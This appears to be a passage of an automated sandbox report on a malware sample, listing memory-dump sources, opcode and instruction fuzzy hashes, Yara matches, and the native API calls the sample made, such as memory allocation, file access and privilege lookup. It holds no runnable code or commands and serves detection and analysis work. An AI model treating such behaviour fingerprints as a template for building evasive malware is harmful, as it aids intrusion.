                                            • Opcode Fuzzy Hash: 196ca1419d573df5616a5a3514185f98006011437ada7086351b75623ed0c4b5
                                            • Instruction Fuzzy Hash: 6D110FB1D006498FCB10CF9AD444ADEFBF8EF89324F14841AD429B7610C378A545CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: $,l
                                            • API String ID: 0-2092904771
                                            • Opcode ID: 0e143cd0437a275585da9cd20b6d33a2b10556b86643ce3c9c1c9ff6702901c2
                                            • Instruction ID: e3b3fb15aac61bdca408c9c5aaf655eb5bf9319b9414611f1e66193c099cfbf3
                                            • Opcode Fuzzy Hash: 0e143cd0437a275585da9cd20b6d33a2b10556b86643ce3c9c1c9ff6702901c2
                                            • Instruction Fuzzy Hash: B8212430E00209CBCB04CFEAD4446EFBBF6EB89224F148529C904B3254EB309941CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            • Opcode Fuzzy Hash: cf826af80cf3e4a01ff93eeee8e5c4315b7e6f3a502ed918fccb29e2bdec98e9
                                            • Instruction Fuzzy Hash: 56110774D00229CFDB60DFA1D848BADB7B1FB48391F1086AAD90AE3245DB745E85DF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a990e3dfcc011d48d58fe9aa7e3b95f999103e20f26be97cd7515378425aec95
                                            • Instruction ID: fdfac92e56fe0e770ab23f3bf377a2e8c0d36f3d61942e8158783b2996bb29a5
                                            • Opcode Fuzzy Hash: a990e3dfcc011d48d58fe9aa7e3b95f999103e20f26be97cd7515378425aec95
                                            • Instruction Fuzzy Hash: 15F06271408384AAEB108F16DC84B62FBA8FF42734F18C45AED085B286C3799C48CAB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2ca09b842b6468f6a0f6865e98b9a23a7cf798e45d69c9eb7546738797c45a9
                                            • Instruction ID: 556f3299258b506a4482a3f5d5344143929ef27581ee7be5759e131d73de796c
                                            • Opcode Fuzzy Hash: e2ca09b842b6468f6a0f6865e98b9a23a7cf798e45d69c9eb7546738797c45a9
                                            • Instruction Fuzzy Hash: 34F017B0E00219DFDB44DFAAD8457AFBBF9FB48315F1085AAC819E3204E7748A419F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d68ae6374397f4b86bd40e97ad74e466b6df15a16d7a2dd4b948d0ccb0aa925
                                            • Instruction ID: afc2f8c50812ce260b536109e22333807da43259e1d0daa52ce0c90d5c9b340b
                                            • Opcode Fuzzy Hash: 7d68ae6374397f4b86bd40e97ad74e466b6df15a16d7a2dd4b948d0ccb0aa925
                                            • Instruction Fuzzy Hash: B9F067B0D04208DFCB04EFA9D9046AEFBFAFB08310F008AA6D81893244E7708A40EE40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66e38242324ba8b8dcbf5595ca45482753ead0d2f865af225247b3f2a6bc1e9d
                                            • Instruction ID: 34e2fea11b29cd7fdadb139a3f303eb5c916136973e98f70d4deb385ce1fed50
                                            • Opcode Fuzzy Hash: 66e38242324ba8b8dcbf5595ca45482753ead0d2f865af225247b3f2a6bc1e9d
                                            • Instruction Fuzzy Hash: 07F0FEB0E04249DFD744DFBA948479EBBF9EB48615F14C5A9D818D3244EB7489409F00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c04c2c266582a3619561cb97b7a183a38f71ab4c092d290d7acd90f36b65e832
                                            • Instruction ID: 2f1fb5b6ea17c0a695a02acfb082050a594672444205eda5075e2256e83e9a13
                                            • Opcode Fuzzy Hash: c04c2c266582a3619561cb97b7a183a38f71ab4c092d290d7acd90f36b65e832
                                            • Instruction Fuzzy Hash: 3CF0F8B0E05209EFDB50DFAAD44979EFBF9EB44615F1081AAC808D3240E7748A40DF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f99f74a0cfbd577297689cb1c277c7ff600788168a3f3d87857ba4b534153797
                                            • Instruction ID: 19b4de070b72305a001369c15012dffa9a1ef95048790bf01d9c7a260c6082b0
                                            • Opcode Fuzzy Hash: f99f74a0cfbd577297689cb1c277c7ff600788168a3f3d87857ba4b534153797
                                            • Instruction Fuzzy Hash: 4BF0F830E01208EFDB40DFAAD44569EFBFAEB45A55F00C5AAC808D3210EB749A41AF00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b176052a90f4d9e83df6d4e4962eeda783d7e411c5edf9fa00067242cfeddf7
                                            • Instruction ID: 66b3730cabfce1b866a47b0a1041a6ec79446aff89463b1c856d328069b519e8
                                            • Opcode Fuzzy Hash: 7b176052a90f4d9e83df6d4e4962eeda783d7e411c5edf9fa00067242cfeddf7
                                            • Instruction Fuzzy Hash: 96F01C70E05208EFDB80DFBAD44979EFBF9EB45615F0081A9C918D3250E7749A80EF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1eeeddeef7cd2a9830a55d16c29385dfb448980e33ecc6c1c985140c586da011
                                            • Instruction ID: 32eeb04d9688548da333d89b21eba526c8977fa6abb33e91634ee183098d3b59
                                            • Opcode Fuzzy Hash: 1eeeddeef7cd2a9830a55d16c29385dfb448980e33ecc6c1c985140c586da011
                                            • Instruction Fuzzy Hash: 46F0F874D0B208EFC711DFA4A849AEDBBB4EB49310F1145DAD80993251EA341A56DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c431e3c6d699f7690f1f91b121dc79bce7df174579fab7807ec88edb5650b7f4
                                            • Instruction ID: 2b55431ab181b071e959f721a399a4236d330f844f24302579753e361175ca87
                                            • Opcode Fuzzy Hash: c431e3c6d699f7690f1f91b121dc79bce7df174579fab7807ec88edb5650b7f4
                                            • Instruction Fuzzy Hash: 94F06D38916208DFC750DFA4E4C96DDBBB4EF09310F2150E9C808C7312E6355E46CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7a62c5dd3e0dfb63f28087c6e3eccb3892cb2590d658d6f6c4287b012d7422b
                                            • Instruction ID: 104ac7dd9651c1d277f7090d209a0f89a729a0c00d15820dac69b8a4c66d2078
                                            • Opcode Fuzzy Hash: f7a62c5dd3e0dfb63f28087c6e3eccb3892cb2590d658d6f6c4287b012d7422b
                                            • Instruction Fuzzy Hash: 79E06D3080A319EFC740DFB4A9896EE7BB4EB46200F2014A99808E3201EA710A8ADB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9009db01c35b68b2ef70b69ad515d174e2533920cf13ec59e29265b4e9412a97
                                            • Instruction ID: 4660346be3facf5042cf38b46fd46a394313166ca9e12e3a2f3503f3ef833047
                                            • Opcode Fuzzy Hash: 9009db01c35b68b2ef70b69ad515d174e2533920cf13ec59e29265b4e9412a97
                                            • Instruction Fuzzy Hash: 17E0DF70602205DBD700CBBAE9087ABB6EEEF05366F0488A0E809C3081EB708940AE50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20e9d3fd1217e48038e89122c9975ef6f7de2b2401127f06d9f7eb8c3429c53e
                                            • Instruction ID: 5aa147457fcfc0dc277b9bcafae0d83946421f4b04c082118308a1d2f83d50ec
                                            • Opcode Fuzzy Hash: 20e9d3fd1217e48038e89122c9975ef6f7de2b2401127f06d9f7eb8c3429c53e
                                            • Instruction Fuzzy Hash: 32E01A74E05208EFCB05DFE8D4406DEBBB9FB49310F1080A9D808A3300E7369A91EF80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ade29a58a68a763d1bacc2b3b7cdba97ca5c52a858df55e542997f73e689a8ed
                                            • Instruction ID: 74599d7553b4e522d88c94fbcab449a1484fd407d3d8a2866a064543fb4c3b0a
                                            • Opcode Fuzzy Hash: ade29a58a68a763d1bacc2b3b7cdba97ca5c52a858df55e542997f73e689a8ed
                                            • Instruction Fuzzy Hash: B8F0F878E00228DFEB60DF61D848B98B7B2FB44341F108195D94DE3256CB745E85DF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e3d186509bbfe533be1b35c0fcc91066975c5e57b62393f60909ffd06722099
                                            • Instruction ID: 557ba67fbebe644358db809947e58e6e8dee10dc8c84b468b9c06a074680af22
                                            • Opcode Fuzzy Hash: 6e3d186509bbfe533be1b35c0fcc91066975c5e57b62393f60909ffd06722099
                                            • Instruction Fuzzy Hash: 3FE01274D06208DFC700DFA4D84869DBBB4EB48310F1080A5880893300EB342E51DF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55d05747046ebfcb82f1ea6d72330d5dcd778af714f561e5c60427c0a78eb1ef
                                            • Instruction ID: ed8a1aada3a5f310ba9b95e930e3b060ddc36451031fecee14e8aa4fd3c56fa4
                                            • Opcode Fuzzy Hash: 55d05747046ebfcb82f1ea6d72330d5dcd778af714f561e5c60427c0a78eb1ef
                                            • Instruction Fuzzy Hash: EBE0BF38915618DFC750DFA8D449A9DBBF8EB08715F6040E9DC0997351E671AE40DB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82b352037f354ecbb2c023e4502d3842bfaf391073e3dab9ec332cbeafae24a0
                                            • Instruction ID: f7d15c9b6158f3b8a96be8e88c4cf38f6f7b2a434f46fd03a8886ba20db50076
                                            • Opcode Fuzzy Hash: 82b352037f354ecbb2c023e4502d3842bfaf391073e3dab9ec332cbeafae24a0
                                            • Instruction Fuzzy Hash: 8CE0EC34D1A21DDFC744DFF8D9496EEBBB8AB05214F2001A98C08A3240EB715A819B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e676751dcdd39c957b15fd1599a93f34a80c21e7325705da6f86bc6d6ff07b93
                                            • Instruction ID: 7e799fc668ec33574448290887f93f086a61ed74018db109c8aeab2e781fb7ac
                                            • Opcode Fuzzy Hash: e676751dcdd39c957b15fd1599a93f34a80c21e7325705da6f86bc6d6ff07b93
                                            • Instruction Fuzzy Hash: FFD0A578115105DBC310DF75B40C7773AACD707256F005DD4DC09C3181F6708401BD51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e7e21aac341391db24d6a57c968b819ed46b1b187c7593df7379028e32cb9f8
                                            • Instruction ID: 72df061153720db4de78486e399cc2c8ef9c4c5494fb162482d57caa6f2fc9a9
                                            • Opcode Fuzzy Hash: 5e7e21aac341391db24d6a57c968b819ed46b1b187c7593df7379028e32cb9f8
                                            • Instruction Fuzzy Hash: 24D05E34D0421DCFEB64DF94D0896DCB772FB00314F108695D609D2106CB749E85EF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10821014ad77aa61e68f7d890c67775913c6bf98f0194361bc3797c3afac354f
                                            • Instruction ID: 9a19c7344abb07e6adf1a195278a8ee1013186c887dbdc0052653ec9b56510b7
                                            • Opcode Fuzzy Hash: 10821014ad77aa61e68f7d890c67775913c6bf98f0194361bc3797c3afac354f
                                            • Instruction Fuzzy Hash: 11C04C74924114CBC715CF14D9A46A87779FB49352F0005D4A90E62141D7701F80DE45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Executed Functions

                                            APIs
                                            • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1:A$r=A$r=A
                                            • API String ID: 2738559852-4243674446
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1:A$r=A$r=A
                                            • API String ID: 2738559852-4243674446
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041860D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418715
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188BD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 65A
                                            • API String ID: 1279760036-2085483392
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 0b9f3e2777f9b9c9f64b15974f5f749d78192690e6137513a087d7991a9974ad
                                            • Instruction ID: d593e9361b8f901df4ab9315801aac8de0e07cf32cb081cd2a76ddc773bf3396
                                            • Opcode Fuzzy Hash: 0b9f3e2777f9b9c9f64b15974f5f749d78192690e6137513a087d7991a9974ad
                                            • Instruction Fuzzy Hash: 20E022712002046BCB14DF58CC4AEDB7369EF88340F108514FD089B342C230E802CBF1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: a3f3ee3cb9ffbb11adea4fbc12c88e3e6e8334bc09bffa8ae53608e8eb042dd8
                                            • Instruction ID: e5332348da5b59533d6ade47f11be478ceaf701206163b642f5670b3d75938cc
                                            • Opcode Fuzzy Hash: a3f3ee3cb9ffbb11adea4fbc12c88e3e6e8334bc09bffa8ae53608e8eb042dd8
                                            • Instruction Fuzzy Hash: 28F0A9B2200215AFDB20CF14CC88EEBB769EF85314F0081A8FD08AB241DA31A850CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 2a8b4d01c77f57f9537e4a8c9056324bca9a4fb502523cc2798246bee73f8781
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: D7E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FA085B242C630E910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: fa95252e36870a94604636740fee15c405cfb0840f5ac42baad6929b42f97f84
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 1AE01AB12002086BDB10DF49CC85EE737ADAF89650F018555FA0857241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: ebe942e9f85fd7778464d46fb55928cc225e25ca24bfac27d2b1ada9d5edf0ef
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 09D012716002147BD620DB99CC85FD7779CDF49750F018465BA1C5B241C531BA00C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
